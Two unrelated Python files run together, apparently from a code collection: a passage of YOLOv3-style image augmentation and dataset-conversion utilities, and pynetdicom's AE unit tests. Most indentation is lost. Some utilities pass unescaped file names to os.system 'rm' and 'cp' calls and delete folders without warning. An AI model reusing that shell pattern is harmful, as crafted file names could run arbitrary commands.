img_hsv[:, :, 0], None, 179, out=img_hsv[:, :, 0]
) # inplace hue clip (0 - 179 deg)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [
int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)
] # mosaic center x, y
img4 = np.zeros((s * 2, s * 2, 3), dtype=np.uint8) + 128 # base image with 4 tiles
indices = [index] + [
random.randint(0, len(self.labels) - 1) for _ in range(3)
] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
x1a, y1a, x2a, y2a = (
max(xc - w, 0),
max(yc - h, 0),
xc,
yc,
) # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = (
w - (x2a - x1a),
h - (y2a - y1a),
w,
h,
) # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Load labels
label_path = self.label_files[index]
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, "r") as f:
x = np.array(
[x.split() for x in f.read().splitlines()], dtype=np.float32
)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
else:
labels = np.zeros((0, 5), dtype=np.float32)
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(
img4,
labels4,
degrees=self.hyp["degrees"] * 1,
translate=self.hyp["translate"] * 1,
scale=self.hyp["scale"] * 1,
shear=self.hyp["shear"] * 1,
border=-s // 2,
) # border to remove
return img4, labels4
def letterbox(
img,
new_shape=(416, 416),
color=(128, 128, 128),
auto=True,
scaleFill=False,
scaleup=True,
interp=cv2.INTER_AREA,
):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = max(new_shape) / max(shape)
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 32), np.mod(dh, 32) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(
img, new_unpad, interpolation=interp
) # INTER_AREA is better, INTER_LINEAR is faster
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(
img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color
) # add border
return img, ratio, (dw, dh)
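# Worked example (illustrative numbers, not from the original source): letterboxing
# a 1080x1920 (h x w) frame with new_shape=416 and auto=True gives r = 416 / 1920,
# new_unpad = (416, 234) and 182 px of height padding, which np.mod(..., 32) trims
# to 22 px, split as 11 px top and 11 px bottom, so the returned image has shape
# (256, 416, 3) with ratio (r, r) and padding (dw, dh) = (0.0, 11.0).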
def random_affine(
img, targets=(), degrees=10, translate=0.1, scale=0.1, shear=10, border=0
):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
if targets is None: # targets = [cls, xyxy]
targets = []
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
R[:2] = cv2.getRotationMatrix2D(
angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s
)
# Translation
T = np.eye(3)
T[0, 2] = (
random.uniform(-translate, translate) * img.shape[0] + border
) # x translation (pixels)
T[1, 2] = (
random.uniform(-translate, translate) * img.shape[1] + border
) # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
changed = (border != 0) or (M != np.eye(3)).any()
if changed:
img = cv2.warpAffine(
img,
M[:2],
dsize=(width, height),
flags=cv2.INTER_AREA,
borderValue=(128, 128, 128),
)
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(
n * 4, 2
) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * (
np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)
).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = (
[0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16
) # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(
path="../data/sm4/images", img_size=1024
): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + "_reduced" # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob("%s/*.*" % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(
img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA
) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except Exception:
print("WARNING: image failure %s" % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ["../data/sm4/images", "../data/sm4/background"]:
create_folder(path + "bmp")
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(
glob.glob("%s/*%s" % (path, ext)), desc="Converting %s" % ext
):
cv2.imwrite(
f.replace(ext.lower(), ".bmp").replace(path, path + "bmp"),
cv2.imread(f),
)
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ["../data/sm4/out_train.txt", "../data/sm4/out_test.txt"]:
with open(file, "r") as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace("/images", "/imagesbmp")
lines = lines.replace("/background", "/backgroundbmp")
for ext in formats:
lines = lines.replace(ext, ".bmp")
with open(file.replace(".txt", "bmp.txt"), "w") as f:
f.write(lines)
def recursive_dataset2bmp(
dataset="../data/sm4_bmp",
): # from utils.datasets import *; recursive_dataset2bmp()
# Converts dataset to bmp (for faster training)
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
for a, b, files in os.walk(dataset):
for file in tqdm(files, desc=a):
p = a + "/" + file
s = Path(file).suffix
if s == ".txt": # replace text
with open(p, "r") as f:
lines = f.read()
for f in formats:
lines = lines.replace(f, ".bmp")
with open(p, "w") as f:
f.write(lines)
elif s in formats: # replace image
cv2.imwrite(p.replace(s, ".bmp"), cv2.imread(p))
if s != ".bmp":
os.system("rm '%s'" % p)
def imagelist2folder(
path="data/coco_64img.txt",
): # from utils.datasets import *; imagelist2folder()
# Copies all the images in a text file (list of images) into a folder
create_folder(path[:-4])
with open(path, "r") as f:
for line in f.read().splitlines():
os.system('cp "%s" %s' % (line, path[:-4]))
print(line)
def create_folder(path="./new_folder"):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
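# Minimal smoke test (a sketch, not part of the original module; the synthetic
# frame and box below are made up). Note this module uses relative imports, so
# it has to be run as part of its package, e.g. `python -m <package>.datasets`.
if __name__ == "__main__":
    frame = np.full((720, 1280, 3), 114, dtype=np.uint8)  # synthetic BGR frame
    boxed, ratio, pad = letterbox(frame, new_shape=416)
    print("letterboxed:", boxed.shape, "ratio:", ratio, "pad:", pad)
    box = np.array([[100.0, 150.0, 300.0, 400.0]])  # one box in x1y1x2y2 format
    print("as xywh:", xyxy2xywh(box))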
|
test_ae.py
|
"""Tests for the ae module."""
import logging
import os
import signal
import threading
import time
import pytest
from pydicom import read_file, config as PYD_CONFIG
from pydicom.dataset import Dataset
from pydicom.uid import UID, ImplicitVRLittleEndian
from pynetdicom import (
AE,
build_context,
_config,
debug_logger,
DEFAULT_TRANSFER_SYNTAXES,
evt,
PYNETDICOM_IMPLEMENTATION_UID,
PYNETDICOM_IMPLEMENTATION_VERSION,
StoragePresentationContexts,
VerificationPresentationContexts,
)
from pynetdicom.presentation import build_context
from pynetdicom.sop_class import RTImageStorage, Verification
from pynetdicom.transport import AssociationServer, RequestHandler
if hasattr(PYD_CONFIG, "settings"):
PYD_CONFIG.settings.reading_validation_mode = 0
# debug_logger()
TEST_DS_DIR = os.path.join(os.path.dirname(__file__), "dicom_files")
DATASET = read_file(os.path.join(TEST_DS_DIR, "RTImageStorage.dcm"))
COMP_DATASET = read_file(
os.path.join(TEST_DS_DIR, "MRImageStorage_JPG2000_Lossless.dcm")
)
def test_blocking_handler():
"""Test binding events to the blocking AssociationServer."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
def handle_echo(event):
return 0x0000
handlers = [(evt.EVT_C_ECHO, handle_echo)]
thread = threading.Thread(
target=ae.start_server,
args=(("localhost", 11112),),
kwargs={"evt_handlers": handlers},
)
thread.daemon = True
thread.start()
time.sleep(0.1)
ae.shutdown()
class TestMakeServer:
"""Tests for AE.make_server()"""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_default_arguments(self):
self.ae = ae = AE()
ae.add_supported_context(Verification)
server = ae.make_server(("localhost", 11112))
assert isinstance(server, AssociationServer)
def test_custom_request_handler(self):
class MyRequestHandler(RequestHandler):
pass
self.ae = ae = AE()
ae.add_supported_context(Verification)
server = ae.make_server(("localhost", 11112), request_handler=MyRequestHandler)
assert server.RequestHandlerClass is MyRequestHandler
def test_aet_bytes_deprecation(self):
"""Test warning if using bytes to set an AE title."""
self.ae = ae = AE()
ae.add_supported_context(Verification)
msg = (
r"The use of bytes with 'ae_title' is deprecated, use an ASCII "
r"str instead"
)
with pytest.warns(DeprecationWarning, match=msg):
server = ae.start_server(
("localhost", 11112), block=False, ae_title=b"BADAE2"
)
assert server.ae_title == "BADAE2"
server.shutdown()
class TestStartServer:
"""Tests for AE.start_server()"""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_ae_title(self):
"""Test the `ae_title` keyword parameter."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.ae_title = "TESTAET"
assert ae.ae_title == "TESTAET"
ae.add_supported_context(Verification)
server = ae.start_server(("localhost", 11112), block=False)
assert server.ae_title == ae.ae_title
server.shutdown()
server = ae.start_server(("localhost", 11112), block=False, ae_title="MYAE")
assert server.ae_title == "MYAE"
ae.require_called_aet = True
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112, ae_title="MYAE")
assert assoc.is_established
assoc.release()
assert assoc.is_released
server.shutdown()
def test_contexts(self):
"""Test the `contexts` keyword parameter."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.ae_title = "TESTAET"
assert ae.ae_title == "TESTAET"
cx = build_context(Verification)
server = ae.start_server(("localhost", 11112), block=False, contexts=[cx])
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112, ae_title="MYAE")
assert assoc.is_established
assert assoc.accepted_contexts[0].abstract_syntax == Verification
assoc.release()
assert assoc.is_released
server.shutdown()
class TestAEVerificationSCP:
"""Check verification SCP"""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
@pytest.mark.skipif(os.name == "nt", reason="Kills pytest on windows")
def test_start_server_keyboard_interrupt(self):
"""Test stopping the SCP with keyboard"""
pid = os.getpid()
def trigger_signal():
time.sleep(0.1)
os.kill(pid, signal.SIGINT)
self.ae = ae = AE()
ae.add_supported_context("1.2.3")
thread = threading.Thread(target=trigger_signal)
thread.daemon = True
thread.start()
ae.start_server(("localhost", 11112))
ae.shutdown()
def test_no_supported_contexts(self):
"""Test starting with no contexts raises"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
with pytest.raises(ValueError, match=r"No supported Presentation"):
ae.start_server(("localhost", 11112))
def test_new_scu_scp_warning(self):
"""Test that a warning is given if scu_role and scp_role bad."""
ae = AE()
ae.add_supported_context("1.2.3.4", scp_role=False)
msg = r"The following presentation contexts have "
with pytest.raises(ValueError, match=msg):
ae.start_server(("localhost", 11112))
def test_str_empty(self):
"""Test str output for default AE"""
ae = AE()
ae.__str__()
class TestAEPresentationSCU:
"""Tests for AE presentation contexts when running as an SCU"""
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_associate_context(self):
"""Test that AE.associate doesn't modify the supplied contexts"""
# Test AE.requested_contexts
self.ae = ae = AE()
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.requested_contexts = VerificationPresentationContexts
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert ae.requested_contexts[0].context_id is None
assert len(assoc.requestor.requested_contexts) == 1
assert assoc.requestor.requested_contexts[0].abstract_syntax == (
"1.2.840.10008.1.1"
)
assert assoc.requestor.requested_contexts[0].context_id == 1
assoc.release()
assert not assoc.is_established
assert assoc.is_released
# Test associate(contexts=...)
ae.requested_contexts = []
assoc = ae.associate(
"localhost", 11112, contexts=VerificationPresentationContexts
)
assert assoc.is_established
assert VerificationPresentationContexts[0].context_id is None
assert len(assoc.requestor.requested_contexts) == 1
assert assoc.requestor.requested_contexts[0].abstract_syntax == (
"1.2.840.10008.1.1"
)
assert assoc.requestor.requested_contexts[0].context_id == 1
assoc.release()
assert not assoc.is_established
assert assoc.is_released
scp.shutdown()
def test_associate_context_raises(self):
"""Test that AE.associate raises exception if no requested contexts"""
self.ae = ae = AE()
with pytest.raises(RuntimeError):
assoc = ae.associate("localhost", 11112)
class TestAEGoodTimeoutSetters:
def test_acse_timeout(self):
"""Check AE ACSE timeout change produces good value"""
ae = AE()
assert ae.acse_timeout == 30
ae.acse_timeout = None
assert ae.acse_timeout is None
ae.acse_timeout = -100
assert ae.acse_timeout == 30
ae.acse_timeout = "a"
assert ae.acse_timeout == 30
ae.acse_timeout = 0
assert ae.acse_timeout == 0
ae.acse_timeout = 30
assert ae.acse_timeout == 30
def test_dimse_timeout(self):
"""Check AE DIMSE timeout change produces good value"""
ae = AE()
assert ae.dimse_timeout == 30
ae.dimse_timeout = None
assert ae.dimse_timeout is None
ae.dimse_timeout = -100
assert ae.dimse_timeout == 30
ae.dimse_timeout = "a"
assert ae.dimse_timeout == 30
ae.dimse_timeout = 0
assert ae.dimse_timeout == 0
ae.dimse_timeout = 30
assert ae.dimse_timeout == 30
def test_network_timeout(self):
"""Check AE network timeout change produces good value"""
ae = AE()
assert ae.network_timeout == 60
ae.network_timeout = None
assert ae.network_timeout is None
ae.network_timeout = -100
assert ae.network_timeout == 60
ae.network_timeout = "a"
assert ae.network_timeout == 60
ae.network_timeout = 0
assert ae.network_timeout == 0
ae.network_timeout = 30
assert ae.network_timeout == 30
def test_connection_timeout(self):
"""Check AE connection timeout change produces good value"""
ae = AE()
assert ae.connection_timeout is None
ae.connection_timeout = None
assert ae.connection_timeout is None
ae.connection_timeout = -100
assert ae.connection_timeout is None
ae.connection_timeout = "a"
assert ae.connection_timeout is None
ae.connection_timeout = 0
assert ae.connection_timeout is None
ae.connection_timeout = 30
assert ae.connection_timeout == 30
def test_active_acse(self):
"""Test changing acse_timeout with active associations."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context("1.2.840.10008.1.1")
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.acse_timeout == 30
ae.acse_timeout = 5
assert assoc.acse_timeout == 5
assoc.release()
scp.shutdown()
ae.shutdown()
def test_active_dimse(self):
"""Test changing dimse_timeout with active associations."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context("1.2.840.10008.1.1")
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.dimse_timeout == 30
ae.dimse_timeout = 5
assert assoc.dimse_timeout == 5
assoc.release()
scp.shutdown()
def test_active_network(self):
"""Test changing network_timeout with active associations."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context("1.2.840.10008.1.1")
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.network_timeout == 60
ae.network_timeout = 5
assert assoc.network_timeout == 5
assoc.release()
scp.shutdown()
def test_active_connection(self):
"""Test changing connection_timeout with active associations."""
ae = AE()
ae.add_supported_context("1.2.840.10008.1.1")
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context("1.2.840.10008.1.1")
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assert assoc.connection_timeout is None
ae.connection_timeout = 5
assert assoc.connection_timeout == 5
assoc.release()
scp.shutdown()
class TestAEGoodAssociation:
def setup(self):
"""Run prior to each test"""
self.ae = None
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
def test_associate_establish_release(self):
"""Check SCU Association with SCP"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert not assoc.is_established
assert assoc.is_released
scp.shutdown()
def test_associate_max_pdu(self):
"""Check Association has correct max PDUs on either end"""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.maximum_pdu_size = 54321
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
scu_ae = AE()
scu_ae.acse_timeout = 5
scu_ae.dimse_timeout = 5
scu_ae.network_timeout = 5
scu_ae.add_requested_context(Verification)
assoc = scu_ae.associate("localhost", 11112, max_pdu=12345)
assert assoc.is_established
assert scp.active_associations[0].acceptor.maximum_length == (54321)
assert scp.active_associations[0].requestor.maximum_length == (12345)
assert assoc.requestor.maximum_length == 12345
assert assoc.acceptor.maximum_length == 54321
assoc.release()
time.sleep(0.1)
assert scp.active_associations == []
# Check 0 max pdu value - max PDU value maps to 0x10000 internally
assoc = scu_ae.associate("localhost", 11112, max_pdu=0)
assert assoc.requestor.maximum_length == 0
assert scp.active_associations[0].requestor.maximum_length == 0
assoc.release()
scp.shutdown()
def test_association_timeouts(self):
"""Check that the Association timeouts are being set correctly and
work"""
acse_delay = None
dimse_delay = None
def handle_echo(event):
if dimse_delay:
time.sleep(dimse_delay)
return 0x0000
def handle_acse_recv(event):
if acse_delay:
time.sleep(acse_delay)
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 0.5
ae.add_supported_context(Verification)
scp = ae.start_server(
("localhost", 11112),
block=False,
evt_handlers=[
(evt.EVT_ACSE_RECV, handle_acse_recv),
(evt.EVT_C_ECHO, handle_echo),
],
)
scu_ae = AE()
scu_ae.acse_timeout = 30
scu_ae.dimse_timeout = 30
scu_ae.network_timeout = 30
scu_ae.add_requested_context(Verification)
assoc = scu_ae.associate("localhost", 11112)
assert assoc.is_established
# Hit the network timeout
time.sleep(1.0)
assert assoc.is_aborted
assert len(scp.active_associations) == 0
ae.acse_timeout = None
ae.dimse_timeout = None
ae.network_timeout = None
scu_ae.acse_timeout = 30
scu_ae.dimse_timeout = 0
dimse_delay = 1
assoc = scu_ae.associate("localhost", 11112)
assert assoc.is_established
status = assoc.send_c_echo()
time.sleep(1.5)
assert assoc.is_aborted
assert len(scp.active_associations) == 0
# FIXME: If this is `0` we can process an ABORT primitive where
# we expect an ASSOCIATION primitive.
scu_ae.acse_timeout = 0.5
scu_ae.dimse_timeout = 30
acse_delay = 1
assoc = scu_ae.associate("localhost", 11112)
assert not assoc.is_established
assert assoc.is_aborted
time.sleep(1.5)
assert len(scp.active_associations) == 0
scu_ae.acse_timeout = 30
# `0` is an invalid value
scu_ae.connection_timeout = 0.5
scu_ae.dimse_timeout = 30
# The host exists and is routable, but there is a middlebox ignoring
# the initial TCP SYN.
assoc = scu_ae.associate("example.com", 11112)
assert not assoc.is_established
assert assoc.is_aborted
assert len(scp.active_associations) == 0
ae.acse_timeout = 21
ae.dimse_timeout = 22
scu_ae.acse_timeout = 31
scu_ae.connection_timeout = None
scu_ae.dimse_timeout = 32
assoc = scu_ae.associate("localhost", 11112)
assert assoc.is_established
assert scp.active_associations[0].acse_timeout == 21
assert scp.active_associations[0].dimse_timeout == 22
assert assoc.acse_timeout == 31
assert assoc.dimse_timeout == 32
assoc.release()
scp.shutdown()
def test_connection_timeout(self, caplog):
# * ACSE timeout does not start until connection timeout completes
# * Logs indicate that we hit the timeout case
scu_ae = AE()
scu_ae.acse_timeout = 0.5
scu_ae.connection_timeout = 1
scu_ae.add_requested_context(Verification)
with caplog.at_level(logging.ERROR, logger="pynetdicom"):
assoc = scu_ae.associate(
"8.8.8.8",
11112,
bind_address=("", 0),
)
assert not assoc.is_established
assert assoc.is_aborted
msgs = [
"TCP Initialisation Error: timed out",
"TCP Initialisation Error: [Errno -2] Name or service not known",
# "TCP Initialisation Error: [Errno 113] No route to host",
]
assert len([m for m in msgs if m in caplog.text]) == 1
def test_select_timeout_okay(self):
"""Test that using start works OK with timeout."""
# Multiple release/association in a short time causes an OSError as
# the port is still in use due to the use of select.select() with
# a timeout. Fixed by using socket.shutdown in stop()
for ii in range(3):
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
scp = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
assoc = ae.associate("localhost", 11112)
assert assoc.is_established
assoc.release()
assert assoc.is_released
assert not assoc.is_established
scp.shutdown()
def test_aet_bytes_deprecation(self):
"""Test warning if using bytes to set an AE title."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.dimse_timeout = 5
ae.network_timeout = 5
ae.add_supported_context(Verification)
server = ae.start_server(("localhost", 11112), block=False)
ae.add_requested_context(Verification)
msg = (
r"The use of bytes with 'ae_title' is deprecated, use an ASCII "
r"str instead"
)
with pytest.warns(DeprecationWarning, match=msg):
assoc = ae.associate("localhost", 11112, ae_title=b"BADAE2")
assert assoc.acceptor.ae_title == "BADAE2"
assert assoc.requestor.ae_title == "PYNETDICOM"
server.shutdown()
class TestAEBadAssociation:
def test_raise(self):
"""Test bad associate call"""
ae = AE()
ae.add_requested_context(Verification)
with pytest.raises(TypeError):
ae.associate(1112, 11112)
with pytest.raises(TypeError):
ae.associate("localhost", "1.2.3.4")
def test_invalid_ae_title(self):
"""Test invalid AE.ae_title"""
ae = AE()
ae.add_requested_context(Verification)
msg = r"Invalid 'ae_title' value - must not consist entirely of spaces"
with pytest.raises(ValueError, match=msg):
ae.associate("localhost", 11112, ae_title=" ")
msg = (
r"Invalid 'ae_title' value '\u200b5' "
r"- must only contain ASCII characters"
)
with pytest.raises(ValueError, match=msg):
aet = b"\xe2\x80\x8b\x35".decode("utf8")
ae.associate("localhost", 11112, ae_title=aet)
msg = (
r"Invalid 'ae_title' value '1234567890ABCDEFG' "
r"- must not exceed 16 characters"
)
with pytest.raises(ValueError, match=msg):
ae.associate("localhost", 11112, ae_title="1234567890ABCDEFG")
msg = r"Invalid 'ae_title' value - must not be an empty str"
with pytest.raises(ValueError, match=msg):
ae.associate("localhost", 11112, ae_title="")
msg = (
r"Invalid 'ae_title' value 'TEST\\ME' - must not contain control "
r"characters or backslashes"
)
with pytest.raises(ValueError, match=msg):
ae.associate("localhost", 11112, ae_title="TEST\\ME")
msg = r"'ae_title' must be str, not 'int'"
with pytest.raises(TypeError, match=msg):
ae.associate("localhost", 11112, ae_title=12345)
class TestAEGoodMiscSetters:
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_ae_title_good(self):
"""Check AE title change produces good value"""
ae = AE()
ae.ae_title = " TEST "
assert ae.ae_title == " TEST "
ae.ae_title = " TEST"
assert ae.ae_title == " TEST"
ae.ae_title = "a TES"
assert ae.ae_title == "a TES"
ae.ae_title = "a TEST"
assert ae.ae_title == "a TEST"
def test_aet_bytes_deprecation(self):
"""Test warning if using bytes to set an AE title."""
msg = (
r"The use of bytes with 'ae_title' is deprecated, use an ASCII "
r"str instead"
)
with pytest.warns(DeprecationWarning, match=msg):
ae = AE(b"BADAE")
assert ae.ae_title == "BADAE"
def test_implementation(self):
"""Check the implementation version name and class UID setters"""
ae = AE()
ae.implementation_version_name = None
assert ae.implementation_version_name is None
ae.implementation_class_uid = "1.2.3"
assert ae.implementation_class_uid == "1.2.3"
